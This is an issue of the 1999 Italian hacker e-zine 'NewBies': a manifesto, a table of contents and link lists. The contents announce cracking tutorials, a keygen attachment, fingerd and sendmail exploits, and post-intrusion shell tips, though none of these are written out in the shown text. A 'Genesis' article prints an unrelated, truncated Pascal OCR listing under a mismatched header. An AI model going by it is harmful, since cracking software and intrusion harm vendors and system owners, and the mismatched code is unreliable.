Copy Link
Add to Bookmark
Report

NewBies 4

eZine's profile picture
Published in 
NewBies
 · 21 Aug 2019

  


@-,”ì'ì”,.,”ì'ì”,.,”ì'ì”,.,”ì'ì”,.,”ì'ì”,-@
| _ _ ____ _ |
| | \ | | _____ _| __ )(_) ___ ___ |
-+- | \| |/ _ \ \ /\ / / _ \| |/ _ Y __|-+-
: | |\ | __/\ V V /| |_) | | __|__ \ :
| |_| \_|\___| \_/\_/ |____/|_|\___|___/ |
@-,”ì'ì”,.,”ì'ì”,.,”ì'ì”,.,”ì'ì”,.,”ì'ì”,-@

NEW BIES (num 4) (data 26/08/99)

[ powered By ZeroCool and N0bodY88 ]

DISCLAIMER LEGALE
------------------------------------------------------------------------------
IL NEWBIES STAFF NON SI ASSUME NESSUNA RESPONSABILITA' X L'UTILIZZO DELLE
TECNICHE SOTTO RIPORTATE, LE QUALI SONO STATE DISTRIBUITE UNICAMENTE X
CONDIVIDERE LE CONOSCENZE DA NOI "ACUISITE" (mitico edu...) E PER CERCARE
QUALCUNO CON CUI CONFONTARE LE NS ESPERIENZE E LE CONOSCENZE X MIGLIORARE
VICENDEVOLMENTE.....DIVERTENDOSI! N0bodY88 of NewBies Staff
------------------------------------------------------------------------------

PREMESSA
ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ
Questa e-zine e' nata in una giornata qualsiasi di gennaio, mentre 2 newbies
stavano parlando tra loro in IRC di non mi ricordo cosa. Da quel fatidico
giorno la e-zine e' cresciuta, le persone che ho contattato x scrivere un
articolo mi hanno dato la loro disponibilita' e entro alcuni giorni mi hanno
fatto avere il loro operato. Alcune persone hanno fatto tardi x notti intere
(fra cui il sottoscritto) ed hanno sacrificato il loro tempo x creare qualcosa
che fosse nuovo, divertente, che ci facesse diventare + bravi, + amici, + uniti
e forse...beh...forse anche + famosi...hihihi! Questo e' quello che abbiamo
realizzato insieme, collaborando e scambiandoci opinioni. Se questa e-zine
non vi piace, e' troppo semplice o e' stupida non scriveteci (oppure scriveteci
x migliorare un art. della e-zine sfruttando le vostre conoscenze) ma se solo
sara' piaciuta ad una persona, se solo un ragazzo dopo aver letto questa avra'
deciso di passare a linux, di programmare in visual basic, di farsi una propria
backdoor o di mettersi a studiare come si usa telnet (troppo poco attrezzato di
voci nei menu x essere quello tanto decantato dovunque, ma anche troppo simpatico
con il suo prompt a mo di Commodore 64) allora questa e-zine sara' servita a
qualcosa. E ricordate...newbies si nasce, hacker si diventa.
Buona lettura ^__^ N0bodY88
ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

INTRODUZIONE:

Creatura nata per vivere e cibarsi del Sacro cibo della Conoscenza ,
attendiamo alla ricerca di nuovi orizzonti nuove culture con cui confrontarci.
Crediamo da tempo in cio' che altri non credono
Vediamo cio' che gli altri non immaginano ,
Sentiamo il suono della conoscenza che impregna la vista e la mente ,
Noi siamo il futuro , un futuro in cui il mondo cieco e stolto non vuole
credere . Siamo hacker e ricorda tu stolto che il nostro grido e'
unisono : CoNosCenZa .
Il mondo forse non e' preparato ad accetare usi e idee che quotidianamente
noi promulghiamo.
Tu giudicatore Tu fautore di morte ... Ricorda noi siamo e sempre saremo
piu' forti di te' perche' il sapere ci affascina come un frutto proibito e
quotidianamente ce ne cibiamo. Questo e' il mio credo , la mia vita e il mio
essere stesso..
ZeroCool

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
º ARTICOLO ÌÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎ͹ AUTORE º
ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹
|PREMESSA N0bodY88 |
|INTRODUZIONE ZeroCool |
|NOVITA' NewBies Staff |
³ BFI, SPIPPOLATORI, T0RMENTO, VANA IMAGO E TANTO ALTRO N0bodY88 ³
³ ACTUAL SITUATION: [DIFFERENCE] ZeroCool ³
³ RIEPILOGO LINK IN ORDINE ALFABETICO N0bodY88 ³
|INFO SUGLI ALLEGATI NewBies Staff |
³ 2 PAROLE SUGLI ALLEGATI N0bodY88 ³
|PROGRAMMAZIONE NewBies Staff |
³ GENESIS (GEneral NEural SImulation System) ZeroCool ³
³ PROGETTO ANGELA : OVVERO COME BUTTARE IL TEMPO ;) N0bodY88 ³
|CRACKING NewBies Staff |
³ HOW TO VTT 1.75 DeViLNeT ³
³ GENERATORE DI CHIAVI X MIRC32 5.6 Cod ³
³ MA XCHE' SBORSARE 29 DOLLARI PER REGISTRARE WINZIPPO ???? DeViLNeT ³
³ APPROFONDIMENTO SULLE CHIAVI HASP BlackDruiD ³
|TEORIA NewBies Staff |
³ SOX...WINGAYZ E PROXY...CHE CONFUSIONE... Dante Alighieri³
³ ER COSIDDETTO MONITORAGGIO N0bodY88 ³
|TRADUZIONI NewBies Staff |
³ COME CAMBIARE IL NOME DI REGISTRAZIONE DI WINDOWS 95 E 98 N0bodY88 ³
³ FINGERD EXPLOIT N0bodY88 ³
|LE INTERVISTE E LE NOTTATE IMPOSSIBILI NewBies Staff |
³ INTERVISTA AD UN PERFETTO ANONIMO N0bodY88 ³
|PHREAKING NewBies Staff |
³ TELECUM BRUTE FORCIN' Dante Alighieri³
|LINUX - UNIX - VARI NewBies Staff |
³ COME PARTIZIONARE L'HD X LINUX Z10-K41i ³
³ GESTIONE DEI PERMESSI SU FILE E DIRECTORY DI LINUX/UNIX EsPoNeNtIaL FoRcE³
³ SCHERZI SIMPATICI DA FARE AL SYSADMIN Pankrazio ³
³ TABELLUZZA DI VI Dante+N0bodY88 ³
³ MINI GUIDA ALL'INSTALLAZIONE DI BITCHX SOTTO UNIX OS \JusTme\ ³
³ COME CI SI MUOVE IN LINUX St0rM BriNgeR ³
³ COME SI CREA UN NUOVO UTENTE IN LINUX St0rM BriNgeR ³
³ COSA FARE DOPO AVER OTTENUTO ACCESSO AD UNA SHELL St0rM BriNgeR ³
³ FILOSOFIA DI UNIX X-ReWoP ³
³ COME MONTARE IL CDROM IN LINUX St0rM BriNgeR ³
|IL MONDO DI IRC NewBies Staff |
³ GUIDA X I BOT FOR REALLY NEWBIES BUT GOOD TO READ Pankrazio ³
³ SkRiPT mIRC? NO POBBEM! 1^tempo Ennaro ³
³ IRCWAR - FONDAMENTI St0rM BriNgeR ³
|HACKING DI TUTTO DI PIU' E DIVERSI ART. MOLTO INTERESSANTI NewBies Staff |
³ IL MIO IP? BOH! Mr Skull ³
³ LE LEGGI IN ITALIA SULL'HACKING S_A_S_H_A ³
³ GUIDA ALL' ASSEMBLAGGIO DI UN COMPUTER DALLA A ALLA Z Devil_666 ³
³ MANIFESTO DI CARNIFEX Carnifex ³
³ RENDIAMOCI ANONIMI ZeroCool ³
³ IL MIO EXPLOIT PREFERITO... SM 8.8.4 !!! Dante Alighieri³
³ TELEPIU' TERRESTRE: INFO VARIE JohnnyRunner ³
³ BENZINA A GO G0! HarLoK ³
³ BREVE E SEMPLICE LISTA DI ATTACCHI BASATI SU DATI KarmA_YogA ³
³ MP3 IN AUTO: FANTASIE OLTRE LA REALTA' JohnnyRunner ³
³ L'UOVO DE COLOMBO Dante Alighieri³
³ QUALKE TRUCCO DA PIPPO CALO' Pippo Calo' ³
|SALUTI N0bodY88 |
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ
²°°°°°°°°°°°ÛÛÛ°°°ÛÛ°°ÛÛÛÛÛÛ°°ÛÛ°°°°°°°ÛÛ°°ÛÛ°°ÛÛÛÛÛÛÛÛÛÛ°°°°°°°°°°ÛÛ°°°°°°°°²
²°°°°°°°°°°°ÛÛÛÛ°°ÛÛ°°ÛÛ²²ÛÛ°°°ÛÛ°°°°°ÛÛ°°°°°°°Û°°°ÛÛ°°°Û°°°°°ÛÛÛ°°ÛÛ°°°°°°°°²
²°°°°°°°°°°°ÛÛ°ÛÛ°ÛÛ°°ÛÛ²²ÛÛ°°°°ÛÛ°°°ÛÛ°°°°ÛÛ°°ÛÛÛ°ÛÛ°ÛÛÛ°°°°ÛÛ²ÛÛ°°°°°°°°°°°²
²°°°°°°°°°°°ÛÛ°°ÛÛÛÛ°°ÛÛ²²ÛÛ°°°°°ÛÛ°ÛÛ°°°°°ÛÛ°°°°°°ÛÛ°°°°°°°ÛÛÛÛÛÛÛ°°°°°°°°°°²
²°°°°°°°°°°°ÛÛ°°°ÛÛÛ°°ÛÛÛÛÛÛ°°°°°°ÛÛÛ°°°°°°ÛÛ°°°°°°ÛÛ°°°°°°ÛÛ°°°°°ÛÛ°°°°°°°°°²
ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ BFI, SPIPPOLATORI, T0RMENTO, VANA IMAGO E TANTO ALTRO ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

BFI = ovviamente parlando di BFI non si puo' non nominare il fantastico gruppo
che ci sta dietro ovvero quelli di softproject, che sono uno tra i
gruppi piu' tosti e produttivi della scena italiana, e non solo x la
loro e-zine x la quale i complimenti sono sempre troppo pochi rispetto
a quelli che meriterebbe, ma anke x il loro fantastico sito che potete
vedere andando al www.softpj.com x il quale /sPIRIT/ se non ha sudato
sangue poco ci manca... Non perdetevi inoltre i vari exploit scoperti
(e qui si denota anke il livello del gruppo) dai membri del softpj
stessi. Come al solito che la maledizione vi colga se vi perdete anke+
un solo bit di sito e e-zine... inoltre leggetevi il mitico numero 6
(che io ho gia' stampato) e il number estivo speciale x il quale vi
dovrete far ricoverare x tremenda ridarola acuta...

SPIPPOLATORI = gli spippolatori continuano a sfornare ottimi numeri della loro
magnifica e-zine NetRunners piena di articoli interessanti che
sta avendo un successo sia x le qualita' e la voglia di fare
degli scrittori sia x l'ampia conoscenza che sta alle spalle
di quei nomi che vedete in fondo agli articoli. Il sito ormai
considerato un must sia x il newbies sia x l'hacker piu'
affermato ha cominciato il grande e mitico progetto di cercare
di raccogliere in un unico sito tutte le e-zine nostrane
attinenti all'hacking e a tutte le varie forme di liberta' e
protesta. Segnalo inoltre la marea di testi disponibile sul
sito di produzione degli Spp ma anke mirrorata dai piu' famosi
siti di hacking, unix e dintorni come quello dei dislessici,
quello di quequero e molti altri di cui sarete felici di fare
la conoscenza...

RINGZERO = questo sito creato dal gruppo stesso di Ring0 continua a pubblicare
sempre nuovi tut e sempre piu' interssanti che vanno bene sia x
chi di crackers conosce solo quelli da mangiare sia x chi la sera
dialoga in chat con xOANON, +ORC o FRAVIA quindi fate un po' voi
ma se anke solo minimamente vi interessate di programmazione e/o
craking io un sito cosi' non credo che me lo perderei x nulla al
mondo...quindi crackers di tutti italia...tutti subito al mitico
sito http://ringzer0.cjb.net e vai giu' di teleport ;)

T0RMENT0 = ebbene si' con mia enorme gioia T0rment0 ha deciso di fare una
propria e-zine che sinceramente mi sembra molto piu' che valida e
che abbraccia la filosofia dei newbies. Ottima sia come raccolta
di exploit che come guida x non scoraggiarsi davanti ai listati di
c o ai comandi e la filosofia di unix...che dire...scaricatevela e
giudicatela voi ovviamente al sito del ns mitico scrittore (e ora
anke redattore) T0rment0. E ricordatevi di dare una okkiata anke
al resto del sito oltre a scaricare la e-zine...dove direte voi?
Ovviamente a http://web.interpuntonet.it/xj/ !!!

VANA IMAGO = che dire imo una e-zine molto bella fatta da un grande amico che
mi dispiace vedere cosi' poco, x il resto che dire...basta che
ve la scarichiate e andrete da dio! Per chi non visita + il sito
da un po' sappiate che e' uscito il mitico numero 3 quindi
correte in edicola..ehm...scusate...sapete...l'emozione...

QUEQUERO = l'ormai sempre piu' ricercato Quequero sta sulle bocche di tutti
con la sua fantastica UIC (Universita' Italiana di Cracking) dove
trovare tutorial, attrezzi del mestiere, consigli e molto molto
altro (se non quasi tutto) che potete subito andare a visitare
scrivendo nella barra del vostro browser (ie o netscape non importa
tanto imo (x i precisini lo so ci sono anke opera, lynx etc ;P)) il
seguente url http://quequero.cyb.net dopodiche' crackare non sara'
piu' un sogno cosi' lontanto anke se nonostante tutto la strada e'
lunga e in salita ma poi arriva la discesa :)

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ ACTUAL SITUATION: [DIFFERENCE] ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

La situazione attuale in italia prevede l'implementazione di " un nuovo "
sistema di trasmissione dati l'adsl implementato per ora a milano a quanto
so' da 200 beta tester .
La formula inq uestione che verra' adottata sara' di due tipi:
connessione a 2mb/s con ipfisso
connessione a 4mb/s con ipfisso
I prezzi non saranno la bolletta telefonica e il costo dell'abbonamento pur
adsl addottando la normale linea telefonica per il collegamento . [invia una
stringa alfanumerica al provider].

Ci sara'solamente un fisso da pagare e 0 bolletta al momento non conosco i
prezzi.

The situation in usa is different between italy we have now implement a
various type of technology : adsl [aol 4mb/s ] and cable 7 [1.2mb/s]
The price that society as aol and cable inwiry offer are very good in this
period we 've a price of 20USD for month for cable seven and about 80USD
for aol service..
I know that some place in usa are not connected to this service as ohio
[for adsl] .
Cable modem prize and connectivity from some Inc. are up higher.

ZeroCool

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ RIEPILOGO LINK IN ORDINE ALFABETICO ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

[ D.I.B. ----------------------------------------------> http://come.to/dib ]
[ NetRunners ---------------------> http://members.tripod.com/~teresacanis/ ]
[ NewBies -----------------------------------------> http://newbies.tsx.org ]
[ Quequero ---------------------------------------> http://quequero.cjb.net ]
[ RFC (sito dove le potete trovare) ------------> http://www.faqs.org/rfcs/ ]
[ RingZ3rO ---------------------------------------> http://ringzer0.cjb.net ]
[ Softpj -------------------------------------------> http://www.softpj.com ]
[ SoftWord ------------------------------------------> softword.webjump.com ]
[ Spaghetti Phreakers -----------------> http://come.to/spaghettiphreakers/ ]
[ Spippolatori -------------------------------> http://www.spippolatori.com ]
[ T0rment0 -------------------------------> http://web.interpuntonet.it/xj/ ]
[ Vana - Imago ------------------> http:/members.xoom.com/eripper/index.htm ]

NOTA DI N0bodY88 = Se volete che il nome della vs crew con l'url del vs sito
sia presente nella soprascritta tabella basta che ce lo
comunichiate e sara' fatto sia x siti newbies che x siti
di hacking.

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ
²°°°°°°°°°°°°°°°°°°ÛÛ°°°°ÛÛ°°°°ÛÛÛÛ°°ÛÛÛÛÛÛÛ°°°°°°°°ÛÛÛÛÛÛÛÛÛÛÛÛÛ°Û°°°°°°°°°°°°²
²°°°°°°°°°°°ÛÛÛ°°°°ÛÛ°°°°ÛÛ°°°°ÛÛ°°°°ÛÛ°°°°°°°°°ÛÛÛ°°°°°°ÛÛÛ°°°°°°°°°°°°°°°°°°°²
²°°°°°°°°°°ÛÛ²ÛÛ°°°ÛÛ°°°°ÛÛ°°°°ÛÛÛÛ°°ÛÛ°ÛÛÛÛ°°°ÛÛ²ÛÛ°°°°°ÛÛÛ°°°°ÛÛÛ°°°°°°°°°°°°²
²°°°°°°°°°ÛÛÛÛÛÛÛ°°ÛÛ°°°°ÛÛ°°°°ÛÛ°°°°ÛÛ°°°ÛÛ°°ÛÛÛÛÛÛÛ°°°°ÛÛÛ°°°°ÛÛÛ°°°°°°°°°°°°²
²°°°°°°°°ÛÛ°°°°°ÛÛ°ÛÛÛÛÛ°ÛÛÛÛÛ°ÛÛÛÛ°°ÛÛÛÛÛÛÛ°ÛÛ°°°°°ÛÛ°°°ÛÛÛ°°°°ÛÛÛ°°°°°°°°°°°°²
ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

2 PAROLE SUGLI ALLEGATI:

- angela.pas = sorgente del programma angela fatto da un pazzo della crew...

- angela.exe = l'eseguibile x chi non ha tempo di installarsi pascal o x chi
vuole dare solo un occhiata a che cazzata di prog e'...

- mirckey.exe = prog che genera le chiavi x mirc fatto dal mitico cod.

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ
²°ÛÛÛ°ÛÛÛ°ÛÛÛ°ÛÛÛÛ°ÛÛÛ°°°°°Û°°°°°ÛÛ°°°ÛÛÛÛ°°°ÛÛ°°°°°Û°°°°°ÛÛÛ°Û°ÛÛÛ°ÛÛ°°Û°ÛÛ°²
²°Û°Û°Û°Û°Û°Û°Û°°°°Û°Û°°°°ÛÛÛ°°°°Û°Û°Û°ÛÛ°Û°Û°Û°°°°ÛÛÛ°°°°°°Û°Û°Û°Û°Û°Û°Û°Û°°²
²°ÛÛÛ°ÛÛÛ°Û°Û°Û°ÛÛ°ÛÛÛ°°°ÛÛ°ÛÛ°°°Û°°Û°°ÛÛ°°Û°°Û°°°ÛÛ°ÛÛ°°°°Û°°Û°Û°Û°Û°°ÛÛ°ÛÛ°²
²°Û°°°ÛÛ°°Û°Û°Û°°Û°ÛÛ°°°ÛÛÛÛÛÛÛ°°Û°°°°°ÛÛ°°°°°Û°°ÛÛÛÛÛÛÛ°°Û°°°Û°Û°Û°Û°°°Û°Û°°²
²°Û°°°Û°Û°ÛÛÛ°ÛÛÛÛ°Û°Û°ÛÛ°°°°°ÛÛ°Û°°°°°ÛÛ°°°°°Û°ÛÛ°°°°°ÛÛ°ÛÛÛ°Û°ÛÛÛ°Û°°°Û°ÛÛ°²
ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ GENESIS (GEneral NEural SImulation System) ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

GENESIS (GEneral NEural SImulation System)
Morgan Kaufmann, San Mateo, CA. 485-492, 1989

Genesis come potete leggere e' un progetto di tutto conto . Sinceramente i
progetti sperimentali mi hanno sempre interessato e quindi una volta
riinstallato per la 100 volta il mio caro unix ho compilato subito questo
pakketo indubbiamente unico nel suo genere . Ma volutamente distribuito con i
source e docz per una eventuale modifica. Bhe dopo due giorni di attenta
lettura e documentazione folle tra le migliori universita' online mi sono
venute un paio di idee che ho subito applicato , bhe vediamole insieme
Genesis in se ' stesso ha una struttura molto ramificata ma semplice e
ideale per una sua ricompilazione con eventuali modiche che ho apportato.

bhe pensiamo di modificarlo per non limitarlo alle 4 funzioni [guia'bellisime
che gli sono s tate assegnate]
allora:
/************************************************************************
* *
* File: test.pas *
* *
* training and analysis of *
* multilayer perceptron (MLP) neural networks for mapping. Such *
* networks have sigmoidal hidden units and linear activations in *
* the output units. *
* *
* General routines. *
* *
************************************************************************
program OCR;

(* (c)

Program --
(1) reads PCX file into a viewport ;
(2) converts viewport to a 2 dimensional picture (Xs and .s);
(3) execs to BrainMaker (a neural network);
(4) BrainMaker evaluates the pictures;
(4) converts BrainMaker output evaluations to text;

requires BrainMaker neural net (from California Scientific Software)
and PCX Tools (from Genesis Programming).

*)

uses
Crt, Dos, Graph, pcx_tp;

var
F, F2 : text;

const
{ BGI fonts }
Fonts : array[0..4] of string[13] =
('DefaultFont', 'TriplexFont', 'SmallFont',
'SansSerifFont', 'GothicFont');

{ BGI text directions }
TextDirect : array[0..1] of string[8] =
('HorizDir', 'VertDir');

Num_of_patterns = 10;
Num_of_characters = 2000; { for 80 x 25 Viewport }
Input_file_from_neural_net = 'C:\TP\EXE\BrainRTS.Out';
Output_file_for_neural_net = 'C:\TP\EXE\BrainRTS.In';
OCR_Output_file = 'C:\TP\EXE\OCR.Out';
PCX_file = 'C:\TP\EXE\a.PCX';
Line_length = 79;
Threshold = 0.60;
PCX_type = pcxCGA_6;

type

Weights = array[1..Num_of_characters] of string[4];
Patterns = array[1..Num_of_characters] of string[1];

{ objects }

NNIptr = ^neural_net_interpreter;
neural_net_interpreter = object
Array_index : integer;
First_char, S : string;
Weight : Weights;
Output_pattern : Patterns;
constructor Init;
destructor Done; virtual;
procedure Get_weights;
procedure Output_characters;
end;

Screenptr = ^screen;
screen = object
GraphDriver : integer; { Graphics device driver }
GraphMode : integer; { Graphics mode value }
MaxX, MaxY : word; { Maximum screen resolution }
ErrorCode : integer; { Reports any graphics errors }
MaxColor : word; { Maximum color value available }
pcxReturn : integer;
PixelStatus : integer;
ViewInfo : ViewPortType;
constructor init;
destructor done; virtual;
procedure Initialize;
end;

var

OldExitProc : Pointer; { Saves exit procedure address }

{$F+}
procedure MyExitProc;
begin
ExitProc := OldExitProc; { Restore exit procedure address }
CloseGraph; { Shut down the graphics system }
end; { MyExitProc }
{$F-}

procedure screen.Initialize;
{ Initialize graphics and report errors}
var
InGraphicsMode: boolean; { Flags graphics initialization}
PathToDriver : string; { Stores DOS path to *.BGI & *.CHR }
begin
{ When using Crt & graphics, turn }
{ off Crt's memory-mapped writes }
DirectVideo := False;
OldExitProc := ExitProc; { Save previous exit proc }
ExitProc := @MyExitProc; { Insert our exit proc in chain }
PathToDriver := '';
repeat
GraphDriver := Detect; { Autodetect graphics adapter }
InitGraph(GraphDriver, GraphMode, PathToDriver);
ErrorCode := GraphResult; { Preserve error return }
if ErrorCode <> grOK then { Error? }
begin
Writeln('Graphics error: ', GraphErrorMsg(ErrorCode));
if ErrorCode = grFileNotFound then
begin
Writeln('Enter full path to BGI driver');
Writeln('or type <Ctrl-Break> to quit.');
Readln(PathToDriver);
Writeln;
end
else
Halt(1); { Some other error: terminate }
end;
until ErrorCode = grOK;
end; { Initialize }

{ object constructors & destructors }

constructor screen.init;
begin
end;

destructor screen.done;
begin
end;

constructor neural_net_interpreter.init;
begin
end;

destructor neural_net_interpreter.done;
begin
end;

{ object methods }

procedure neural_net_interpreter.Get_weights;

var
This_weight : string[4];
This_pattern : string[1];
Count : integer;
W : word;
Char_Ptr : integer;
begin
FOR Count := 1 TO Num_of_characters DO { Initialize arrays }
begin
Weight[Count] := ' ';
Output_pattern[Count] := ' ';
end;

Assign(F,Input_file_from_neural_net);
Reset(F);
Array_index := 1;
WHILE Array_index <= Num_of_characters DO
begin
Readln(F,S);
First_char := Copy(S,1,1);
IF First_char = ' ' THEN
begin
Char_Ptr := 2;
FOR Count := 1 TO Num_of_patterns DO
begin
This_weight := Copy(S,Char_Ptr,4);
Weight[Array_index] := This_weight;
Char_Ptr := Char_Ptr + 5;
This_pattern := Copy(S,Char_Ptr,1);
Output_pattern[Array_index] := This_pattern;
Char_Ptr := Char_Ptr + 2;
Inc(Array_index);
end;
end;
end;
Close(F);
end;

procedure neural_net_interpreter.output_characters;

var
Output_char : string;
Pattern_count, Char_count, ReturnCode : integer;
Wt, New_weight : real;

begin
Assign(F2,OCR_Output_file);
Rewrite(F2);
Array_index := 1;
Char_count := 1;

WHILE Array_index <= Num_of_characters DO
begin
Pattern_count := 1;
Wt := 0;
Output_char := ' ';
WHILE Pattern_count <= Num_of_patterns DO
begin
Val(Weight[Array_index],New_weight,ReturnCode);
IF New_weight > Wt THEN
begin
Wt := New_weight;
Output_char := Output_pattern[Array_index];
end;
Inc(Pattern_count);
Inc(Array_index);
end;
IF Wt >= Threshold THEN
Write(F2,Output_char)
ELSE
Write(F2,' ');
IF Char_count > Line_length THEN
begin
Writeln(F2);
Char_count := 0;
end;
